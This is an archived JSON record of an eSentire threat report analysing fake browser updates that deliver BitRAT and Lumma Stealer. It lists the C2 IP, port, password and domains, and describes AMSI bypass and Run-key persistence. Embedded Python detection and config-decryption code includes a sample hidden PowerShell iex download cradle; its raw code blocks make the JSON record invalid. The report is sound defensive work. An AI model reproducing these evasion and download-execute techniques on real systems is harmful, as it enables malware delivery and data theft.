{
	"id": "ccaec3ca-b8bd-4c87-9efd-4c3ea3cb8cc6",
	"created_at": "2026-04-06T00:21:50.895022Z",
	"updated_at": "2026-04-10T03:20:54.837406Z",
	"deleted_at": null,
	"sha1_hash": "08b9e61d3fae4e7f57e721bc3988699021bffedb",
	"title": "Fake Browser Updates delivering BitRAT and Lumma Stealer",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1427913,
	"plain_text": "Fake Browser Updates delivering BitRAT and Lumma Stealer\r\nBy eSentire Threat Response Unit (TRU)\r\nArchived: 2026-04-05 18:01:39 UTC\r\nAdversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters\r\nand Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.\r\nWe have discovered some of the most dangerous threats and nation state attacks in our space – including the\r\nKaseya MSP breach and the more_eggs malware.\r\nOur Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced\r\nThreat Analytics driven by our Threat Response Unit – the TRU team.\r\nIn TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We\r\noutline how we responded to the confirmed threat and what recommendations we have going forward.\r\nHere’s the latest from our TRU Team…\r\nWhat did we find?\r\nIn May 2024, eSentire's Threat Response Unit (TRU) detected an instance of fake updates delivering BitRAT and\r\nLumma Stealer.\r\nFake browser updates have been responsible for numerous malware infections, including those of the well-known\r\nSocGholish malware. In April 2024, we observed FakeBat being distributed via similar fake update mechanisms.\r\nThe infection chain began when the user visited an infected webpage containing injected malicious JavaScript\r\ncode (Figure 1).\r\nhttps://www.esentire.com/blog/fake-browser-updates-delivering-bitrat-and-lumma-stealer\r\nPage 1 of 10\n\nFigure 1: Fake Chrome update\r\nUpon loading the compromised page, the injected malicious JavaScript code is triggered, which directs the user to\r\nthe fake update page (Figure 2). After cleaning up the code, we found redirect code hidden within the JavaScript\r\n(Figure 3). 
The redirect target is only served when the HTTP Referer header matches the compromised web page, so a direct request to the URL (for example from a sandbox or a URL scanner) gets nothing back; anyone replaying the chain for analysis has to supply that Referer.\r\nFigure 2: Injected malicious JavaScript code\r\nFigure 3: Redirect site hidden within the JavaScript\r\nThe chatgpt-app[.]cloud site contains a download link to a Zip archive called ‘Update.zip’, which is automatically\r\ndownloaded onto the victim’s device. The archive is hosted on Discord’s Content Delivery Network (CDN)\r\n(Figure 4).\r\nFigure 4: Download of Update.zip from Discord’s CDN\r\nFake Update\r\nThe fake browser update lure has become a common initial access technique: the victim runs the ‘update’ themselves, so no exploit is needed.\r\nThe JavaScript file (Update.js) contained within the ZIP archive acts as an initial downloader to retrieve the\r\npayloads once executed by the victim. The archive contains several PowerShell scripts responsible for\r\ndownloading and executing the next-stage loader and payloads from http://77[.]221[.]151[.]31.\r\nIn the incident observed, multiple PowerShell scripts ran after the execution of Update.js, as seen in\r\nFigure 5 below:\r\nFigure 5: PowerShell script retrieving payload file\r\nThe IP address identified in the PowerShell script is a known BitRAT Command-and-Control (C2) address, which\r\nhosts both the BitRAT and Lumma Stealer payloads. 
The files carry a .png extension but are not images; they contain the loader,\r\npersistence mechanisms, and the payloads.\r\nThere were four unique files identified in this attack, each serving a different purpose:\r\ns.png – Loader + Lumma Stealer payload\r\nz.png – PowerShell script that creates a Run key for persistence + downloads Loader + BitRAT payload\r\na.png – Loader + BitRAT payload\r\n0x.png – BitRAT persistence file that re-downloads a.png and executes it\r\nStarting with z.png, the PowerShell script bypasses AMSI, renames the payload 0x.png to 0x.log, stores it in the\r\nC:\\Users\\Public directory (writable by every local user, so no elevation is needed), and sets it to run at logon by adding a Registry Run key. It also retrieves and\r\nexecutes a.png, the loader and BitRAT payload (Figure 6).\r\nFigure 6: z.png retrieving 0x.png and a.png\r\nThe 0x.log (0x.png) payload contains an additional PowerShell script which acts as a persistence mechanism for\r\nthe BitRAT payload file, a.png: at each run it downloads a.png again and executes it (Figure 7).\r\nFigure 7: 0x.png downloads and executes a.png via PowerShell\r\nBoth payload-carrying files, a.png and s.png, include an AMSI bypass followed by code that uses .NET reflection to load the loader assembly in memory and execute the payload inside a RegSvcs.exe process (Figure 8).\r\nFigure 8: Simplified version of a.png showing the AMSI bypass and loading\r\nLoader\r\nThere are two parts to the payload files, a.png and s.png – the loader portion and the payload. The loader\r\nmechanism is almost identical in both files; the only observable difference is the file hash.\r\nThe loader is a .NET portable executable (PE) file, obfuscated using Crypto Obfuscator (5.x). 
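The persistence chain described above (z.png dropping 0x.log into C:\\Users\\Public and pointing a Run key at it, with .png files that are really PowerShell or .NET content rather than images) is cheap to hunt for. The Python below is an added example, not code from the eSentire report: it triages Run-key command lines and dropped files for exactly those traits. The sample Run-key values, file paths and file contents are constructed for the example and are not the real artifacts from the incident; the report does not quote the actual z.png command line, so the heuristics key on the behaviours it describes (script host, Public directory, non-script extension, download cradle, AMSI tampering strings, missing PNG magic) rather than on a specific string.

```python
# Hunting heuristics for the persistence pattern described above. All sample data
# below is constructed for this example and is not taken from the incident.

PUBLIC_DIR = r'c:\users\public'
SCRIPT_HOSTS = ('powershell', 'pwsh', 'wscript', 'cscript', 'mshta')
# Extensions that are never a legitimate input for a script host; 0x.log and the
# .png payload files from the report fall in here.
DECOY_EXTENSIONS = ('.log', '.png', '.jpg', '.txt', '.dat')
CRADLE_TOKENS = ('iex', 'invoke-expression', 'downloadstring', 'downloadfile',
                 'invoke-webrequest', 'iwr ', 'frombase64string')
EVASION_FLAGS = ('-w hidden', '-windowstyle hidden', '-ep bypass',
                 '-executionpolicy bypass', '-enc ', '-encodedcommand')
PS_MARKERS = (b'iex', b'invoke-expression', b'new-object', b'downloadstring', b'$')
AMSI_MARKERS = (b'amsiutils', b'amsiinitfailed', b'amsiscanbuffer', b'amsi.dll')
PNG_MAGIC = bytes([0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A])


def _is_windows_path(tok: str) -> bool:
    # drive letter, colon, backslash (chr(92) is the backslash character)
    return len(tok) > 2 and tok[0].isalpha() and tok[1] == ':' and tok[2] == chr(92)


def triage_run_key(command: str) -> list[str]:
    """Return the reasons a Run-key command line looks like the z.png persistence."""
    cmd = command.lower()
    host = next((h for h in SCRIPT_HOSTS if h in cmd), None)
    if host is None:
        return []  # autoruns that are not script hosts are out of scope here
    reasons = []
    if PUBLIC_DIR in cmd:
        reasons.append(f'{host} autorun references {PUBLIC_DIR}')
    for tok in (t.strip('()') for t in cmd.split()):
        if _is_windows_path(tok) and tok.endswith(DECOY_EXTENSIONS):
            reasons.append(f'{host} executes non-script file {tok}')
    if any(t in cmd for t in CRADLE_TOKENS):
        reasons.append(f'{host} command contains a download or eval cradle')
    if any(f in cmd for f in EVASION_FLAGS):
        reasons.append(f'{host} launched with hidden, bypass or encoded flags')
    return reasons


def scan_dropped_file(path: str, content: bytes) -> list[str]:
    """Flag files whose extension does not match their content (0x.log, a.png, s.png)."""
    reasons = []
    low = content.lower()
    ext = '.' + path.lower().rsplit('.', 1)[-1]
    if ext in DECOY_EXTENSIONS and any(m in low for m in PS_MARKERS):
        reasons.append(f'{path}: {ext} extension but content looks like PowerShell')
    if ext == '.png' and not content.startswith(PNG_MAGIC):
        reasons.append(f'{path}: .png extension without PNG magic bytes')
    if content.startswith(b'MZ'):
        reasons.append(f'{path}: PE executable hidden behind {ext}')
    if any(m in low for m in AMSI_MARKERS):
        reasons.append(f'{path}: contains AMSI tampering strings')
    return reasons


def triage_host(run_keys, dropped_files) -> dict[str, list[str]]:
    """Combine both checks; keys are Run-key value names or file paths with findings."""
    findings = {}
    for name, cmd in run_keys:
        if (r := triage_run_key(cmd)):
            findings[name] = r
    for path, content in dropped_files:
        if (r := scan_dropped_file(path, content)):
            findings[path] = r
    return findings


# Constructed samples (hypothetical command lines and contents, not the incident's own):
SAMPLE_RUN_KEYS = [
    ('OneDrive', r'C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background'),
    ('Updater', r'powershell.exe -w hidden -ep bypass -c iex (gc C:\Users\Public\0x.log -Raw)'),
    ('Update', r'wscript.exe //B C:\Users\Public\Update.js'),
]
SAMPLE_FILES = [
    (r'C:\Users\Public\0x.log',
     b'$w=New-Object Net.WebClient; <AmsiUtils.amsiInitFailed set here>; iex $w.DownloadString(<url of a.png>)'),
    (r'C:\Users\Public\logo.png', PNG_MAGIC + bytes(16)),
]

if __name__ == '__main__':
    for subject, reasons in triage_host(SAMPLE_RUN_KEYS, SAMPLE_FILES).items():
        print(subject)
        for r in reasons:
            print('  -', r)
```

In a real hunt the Run-key tuples come from HKCU and HKLM Run/RunOnce exports (or Sysmon event 13) and the file tuples from a sweep of user-writable directories; the checks are deliberately independent so that a renamed payload with no Run key, or a Run key pointing at a file that has already been deleted, still produces a finding.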
The loader is tasked\r\nwith taking the decrypted payload binary handed to it by the file’s PowerShell script and injecting it into RegSvcs.exe, a legitimate, Microsoft-signed .NET Framework binary, so the RAT runs under a trusted process name\r\n(Figure 9).\r\nFigure 9: The deobfuscated loader\r\nBitRAT\r\nBitRAT is a feature-rich remote access tool with capabilities such as two modes of connection (direct reverse\r\nconnection and Tor connection), a UAC bypass for elevated privileges, process protection, and the ability to manage\r\nover 10,000 clients.\r\nIt offers a binder that binds up to 5 files, a remote browser feature supporting Chrome, password recovery for\r\nvarious applications, an XMR miner for cryptocurrency mining, reverse proxy using SOCKS4 mode, remote desktop\r\naccess, webcam live feed, file manager with zip compression, keylogger functions, audio live feed, and SOCKS5\r\nproxy support.\r\nThe BitRAT sample analyzed in this case was UPX packed and contained an encrypted configuration. The\r\nconfiguration data is decrypted using the following steps:\r\n1. First, a decoded string is loaded into memory.\r\n2. A second string is loaded into memory and the first string is appended to it.\r\n3. The CRC-32 checksum of the concatenated string is computed and 8 is added to the result.\r\n4. An MD5 hash is computed over the lowercase (hexadecimal) form of that value.\r\n5. The first 16 characters of the MD5 hex digest are used as the key (16 bytes, i.e. Camellia-128) for the Camellia decryption routine.\r\n6. 
The same key is used to decrypt every encrypted string in the binary, so recovering it once yields the full configuration.\r\nThe decrypted configuration:\r\nHost: 77[.]221[.]151[.]31\r\nPort: 4444\r\nTor Process Name: Tor\r\nInstall Directory: 0\r\nInstall File: 0\r\nPassword: 7b13ff385b95cf25d53088d6b7c5d890\r\nLumma Stealer\r\nLumma Stealer, also known as LummaC2 Stealer, is an information-stealing malware written in C. It\r\nhas been operating as a Malware-as-a-Service on Russian-speaking forums since August 2022. Created by the\r\nthreat actor \"Shamel\" using the alias \"Lumma\", this malware targets cryptocurrency wallets, 2FA browser\r\nextensions, and other sensitive data on victims' machines.\r\nThe stolen data is sent to a C2 server via HTTP POST requests with a user agent beginning with \"Mozilla/5.0\".\r\nAdditionally, Lumma Stealer includes a non-resident loader capable of deploying further malicious payloads in\r\nEXE, DLL, and PowerShell formats.\r\nThis article focuses only on the major sections of Lumma Stealer, as eSentire has previously covered it in\r\ndetail.\r\nThere are notable strings in Lumma Stealer’s C2 communication, including the version and the Lumma ID\r\n(lid), also referred to as the build ID, which uniquely identifies the Lumma build (Figure 10).\r\nFigure 10: Notable strings in Lumma Stealer Payload\r\nThe payload includes the user-agent used by the malware (Figure 11).\r\nFigure 11: User-agent field found in malware config\r\nAnother parameter, \"act\", is initialized with the value \"life\" and used to check in with the C2\r\n(Figure 12).\r\nFigure 12: C2 check-in string\r\nThe sample contains 9 embedded domains used for C2 communications, seen as base64-encoded strings in Figure\r\n13, left. 
During runtime, the C2 domains are extracted using the routine shown in Figure 13 and described below.\r\nFigure 13: Encrypted C2 Strings (left) Decryption Routine (right)\r\nThe C2 domain list decryption function is outlined as follows:\r\n1. First, one of the base64 strings above is loaded into memory.\r\n2. The string is base64-decoded and the resulting bytes are stored in a buffer.\r\n3. The XOR key is located at offset 0x20 from the start of that buffer.\r\n4. The buffer is XORed with this key, which reveals the C2 domain contained in that string.\r\nWe have released a script that performs these operations for the above strings and produces the C2 domains,\r\nwhich is available here.\r\nThe decrypted configuration includes the following C2 domains:\r\ndemonstationfukewko[.]shop\r\nliabilitynighstjsko[.]shop\r\nalcojoldwograpciw[.]shop\r\nincredibleextedwj[.]shop\r\nshortsvelventysjo[.]shop\r\nshatterbreathepsw[.]shop\r\ntolerateilusidjukl[.]shop\r\nproductivelookewr[.]shop\r\naccountasifkwosov[.]shop\r\nThe use of fake updates to deliver a variety of malware shows the operator’s ability to leverage trusted names to\r\nmaximize reach and impact. The .NET loader being identical in both payload files suggests that the\r\nfake update operation functions as a malware delivery service. 
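The two configuration routines described in this post (the BitRAT key derivation, steps 1 to 5 of the BitRAT section, and the Lumma Stealer C2 domain decryption, steps 1 to 4 above) are simple enough to re-implement. The Python below is an added example and is not the eSentire script referenced above. Two details are assumptions because the text does not spell them out: for BitRAT, that the integer 8 is added to the CRC-32 value (with 32-bit wrap) and that the value fed to MD5 is its 8-character lowercase hex form; for Lumma, that each decoded blob is 64 bytes, with the null-padded XOR-encrypted domain in the first 0x20 bytes and the 0x20-byte key at offset 0x20. The Camellia step itself is left out (it needs a third-party library and the cipher mode is not stated), and the Lumma blobs are constructed here with a fixed test key because the real base64 strings from Figure 13 are not reproduced in the text.

```python
import base64
import hashlib
import zlib

# ---------- BitRAT: derive the Camellia key for the encrypted configuration ----------
# Assumption: '8 is added' means the integer 8 is added to the CRC-32 value (32-bit
# wrap), and the MD5 input is the 8-character lowercase hex form of that sum.

def bitrat_crc_step(decoded: str, second: str) -> int:
    # Steps 1-3: the decoded string is appended to the second string, then CRC-32 + 8.
    combined = (second + decoded).encode('latin-1')
    return (zlib.crc32(combined) + 8) & 0xFFFFFFFF


def bitrat_derive_key(decoded: str, second: str) -> bytes:
    # Steps 4-5: MD5 over the lowercase hex of the CRC step; the first 16 hex
    # characters are the key (16 ASCII bytes = 128-bit Camellia key).
    crc_hex = f'{bitrat_crc_step(decoded, second):08x}'
    md5_hex = hashlib.md5(crc_hex.encode('ascii')).hexdigest()
    return md5_hex[:16].encode('ascii')


# ---------- Lumma Stealer: recover C2 domains from the base64 blobs ----------
BLOCK = 0x20  # assumed size of both the ciphertext slot and the XOR key


def lumma_decrypt_c2(b64_blob: str) -> str:
    buf = base64.b64decode(b64_blob)                    # step 2
    if len(buf) < 2 * BLOCK:
        raise ValueError('blob too short to hold ciphertext + key')
    enc, key = buf[:BLOCK], buf[BLOCK:2 * BLOCK]        # step 3: key at offset 0x20
    plain = bytes(c ^ k for c, k in zip(enc, key))      # step 4
    return plain.rstrip(bytes(1)).decode('ascii')       # bytes(1) is one null byte: drop padding


def lumma_encrypt_c2(domain: str, key: bytes) -> str:
    # Inverse of the routine; used only to build constructed test blobs offline.
    raw = domain.encode('ascii')
    if len(raw) > BLOCK or len(key) != BLOCK:
        raise ValueError('domain must fit in 32 bytes and key must be 32 bytes')
    padded = raw.ljust(BLOCK, bytes(1))
    enc = bytes(p ^ k for p, k in zip(padded, key))
    return base64.b64encode(enc + key).decode('ascii')


def lumma_extract_all(blobs):
    return [lumma_decrypt_c2(b) for b in blobs]


# Constructed test data: an arbitrary fixed 32-byte key and three of the report's
# (defanged) domains. These blobs are NOT the real strings from Figure 13.
SAMPLE_KEY = bytes((i * 37 + 11) & 0xFF for i in range(BLOCK))
SAMPLE_DOMAINS = ['demonstationfukewko[.]shop', 'liabilitynighstjsko[.]shop', 'accountasifkwosov[.]shop']
SAMPLE_BLOBS = [lumma_encrypt_c2(d, SAMPLE_KEY) for d in SAMPLE_DOMAINS]

if __name__ == '__main__':
    print('BitRAT CRC step for decoded=a, second=empty: 0x%08x' % bitrat_crc_step('a', ''))
    print('BitRAT derived key:', bitrat_derive_key('a', ''))
    for blob, domain in zip(SAMPLE_BLOBS, lumma_extract_all(SAMPLE_BLOBS)):
        print(blob[:24] + '...', '->', domain)
```

When pointing this at a real sample, feed lumma_decrypt_c2 the base64 strings pulled from the binary; if the output is not printable ASCII, the layout assumption (ciphertext first, key at 0x20) is wrong for that build and the two slots should be swapped before concluding the strings are something else.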
The malware payload is likely interchangeable and will\r\nresult in a variety of different families being loaded in similar incidents in the future.\r\nWhat did we do?\r\nOur 24/7 SOC Cyber Analysts investigated the suspicious activities, notified the client, and isolated the affected\r\ndevice.\r\nWhat can you learn from this TRU Positive?\r\nFake browser update campaigns use sophisticated social engineering tactics by mimicking legitimate\r\nbrowser update prompts that match the user’s browser type and language.\r\nThis targeted approach indicates the need for increased user awareness about the authenticity of\r\nupdate notifications and the sources from which updates are downloaded. A genuine browser update is applied by the browser’s own updater; it never arrives as a ZIP archive containing a .js file that the user is asked to run.\r\nBitRAT and Lumma Stealer were the final payloads in this incident, although other malware\r\nmay well be loaded in future deliveries.\r\nThese final payloads allow attackers to perform reconnaissance, steal sensitive data, and gain\r\nremote access to the infected host.\r\nRecommendations from our Threat Response Unit (TRU):\r\nEnsure that all endpoints are protected with up-to-date antivirus software or an Endpoint Detection and\r\nResponse (EDR) tool capable of detecting and blocking malicious files.\r\nImplement a Phishing and Security Awareness Training (PSAT) program that educates and informs your\r\nemployees on emerging threats in the threat landscape.\r\nIndicators of Compromise\r\nYou can access the indicators of compromise here.\r\nTo learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next\r\nLevel MDR, connect with an eSentire Security Specialist now.\r\nABOUT ESENTIRE’S THREAT RESPONSE UNIT (TRU)\r\nThe eSentire Threat Response Unit (TRU) is an industry-leading threat research team 
committed to helping your\r\norganization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7\r\nSecurity Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and\r\nworks as an extension of your security team to continuously improve our Managed Detection and Response\r\nservice. By providing complete visibility across your attack surface and performing global threat sweeps and\r\nproactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending\r\nyour organization against known and unknown threats.\r\nSource: https://www.esentire.com/blog/fake-browser-updates-delivering-bitrat-and-lumma-stealer",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.esentire.com/blog/fake-browser-updates-delivering-bitrat-and-lumma-stealer"
	],
	"report_names": [
		"fake-browser-updates-delivering-bitrat-and-lumma-stealer"
	],
	"threat_actors": [],
	"ts_created_at": 1775434910,
	"ts_updated_at": 1775791254,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/08b9e61d3fae4e7f57e721bc3988699021bffedb.pdf",
		"text": "https://archive.orkl.eu/08b9e61d3fae4e7f57e721bc3988699021bffedb.txt",
		"img": "https://archive.orkl.eu/08b9e61d3fae4e7f57e721bc3988699021bffedb.jpg"
	}
}